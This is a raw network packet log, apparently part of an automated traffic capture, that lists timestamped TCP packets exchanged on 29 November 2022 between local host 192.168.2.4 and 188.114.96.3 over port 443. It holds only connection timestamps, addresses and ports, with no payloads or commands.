                                  Nov 29, 2022 16:56:46.151609898 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.151644945 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.151803970 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.151818037 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.151875019 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.151937008 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.152046919 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.152008057 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.152117014 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.152132988 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.152189016 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.152729988 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.152765036 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.152803898 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.152818918 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.152847052 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.152872086 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.153028965 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.153060913 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.153103113 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.153115988 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.153134108 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.153158903 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.153671026 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.153707981 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.153752089 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.153768063 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.153789997 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.153815031 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.153939962 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.153971910 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.154009104 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.154021978 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.154046059 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.154069901 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.154576063 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.154620886 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.154654026 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.154670954 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.154692888 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.154716969 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.154860020 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.154938936 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.154918909 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.154963017 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.154998064 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.155019999 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.168838978 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.168910027 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.168986082 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.169002056 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.169030905 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.169032097 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.169065952 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.169071913 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.169090986 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.169110060 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.169126987 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.169147015 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.169337988 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.169369936 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.169410944 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.169425011 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.169449091 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.169478893 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.169984102 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.170017004 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.170063019 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.170078993 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.170109034 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.170129061 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.170217991 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.170250893 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.170281887 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.170291901 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.170322895 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.170396090 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.170957088 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.170991898 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.171070099 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.171083927 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.171148062 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.171232939 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.171292067 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.171303034 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.171314001 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.171351910 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.171376944 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.171931982 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.171962976 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.172014952 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.172029972 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.172069073 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.172203064 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.172228098 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.172259092 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.172271013 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.172296047 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.172308922 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.173027992 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.173062086 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.173101902 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.173116922 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.173142910 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.173160076 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.173372030 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.173401117 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.173434019 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.173446894 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.173460960 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.173482895 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.189665079 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.189692974 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.189762115 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.189815044 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.189836025 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.189870119 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.189917088 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.190049887 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.190078974 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.190121889 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.190133095 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.190150023 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.190192938 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.190232992 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.190265894 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.190274954 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.190300941 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.191003084 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.191031933 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.191102982 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.191123009 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.191641092 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.191684008 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.191728115 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.191745043 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.191762924 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.192539930 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.192590952 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.192610979 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.192630053 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.192656040 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.192764044 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.192796946 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.193346024 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.193382978 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.193397999 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.193417072 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.193434000 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.193465948 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.193543911 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.193562984 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.193608999 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.193618059 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.193645000 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.193665981 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.194092035 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.194124937 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.194169044 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.194184065 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.194219112 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.194226980 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.194261074 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.194261074 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.194281101 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.194308043 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.194339037 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.195142984 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.195173979 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.195251942 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.195271015 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.195326090 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.195427895 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.195451975 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.195516109 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.195527077 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.195543051 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.195574045 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.196008921 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.196041107 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.196093082 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.196109056 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.196140051 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.196149111 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.196180105 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.196206093 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.196213961 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.196274042 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.196311951 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.197006941 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.197026968 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.197110891 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.197129011 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.197177887 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.197254896 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.197282076 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.197320938 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.197331905 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.197388887 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.197388887 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.198009968 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.198048115 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.198116064 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.198132992 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.198158979 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.198188066 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.198251963 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.198287010 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.198359013 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.198369980 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.198406935 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.198415995 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.212536097 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.212570906 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.212631941 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.212662935 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.212691069 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.212708950 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.212714911 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.212723017 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.212743998 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.212779999 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.212789059 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.212809086 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.212831020 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.213053942 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.213072062 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.213140965 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.213155031 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.213193893 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.213311911 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.213330984 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.213376999 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.213387966 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.213422060 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.213443995 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.213915110 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.213934898 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.213978052 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.213994026 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.214015961 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.214041948 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.214173079 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.214190960 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.214251041 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.214263916 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.214319944 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.214978933 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.214998007 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.215069056 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.215085983 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.215111971 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.215133905 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.215334892 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.215354919 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.215409994 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.215423107 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.215464115 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.215754986 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.215797901 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.215828896 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.215842009 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.215867043 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.215888977 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.216335058 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.216377974 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.216408014 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.216423988 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.216454983 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.216478109 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.216602087 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.216641903 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.216671944 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.216682911 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.216711044 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.216733932 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.217293024 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.217329025 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.217374086 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.217389107 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.217411995 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.217438936 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.217504025 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.217542887 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.217571974 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.217581034 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.217617035 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.217638016 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.218202114 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.218249083 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.218287945 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.218303919 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.218327045 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.218358994 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.218408108 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.218446016 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.218480110 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.218491077 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.218534946 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.219110012 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.219127893 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.219152927 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.219221115 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.219233036 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.219264030 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.219285965 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.233535051 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.233586073 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.233633995 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.233664989 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.233695030 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.233700991 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.233721972 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.233752012 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.233767986 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.233799934 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.233809948 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.233822107 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.233870983 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.233921051 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.233944893 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.233988047 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.233998060 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.234018087 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.234040022 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.234074116 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.234097958 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.234158039 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.234169006 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.234215975 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.234539986 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.234575987 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.234667063 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.234687090 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.234750986 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.234837055 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.234867096 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.234946012 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.234957933 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.234982014 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.235003948 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.235476971 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.235506058 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.235569954 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.235589027 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.235632896 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.235807896 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.235837936 CET44349701188.114.96.3192.168.2.4
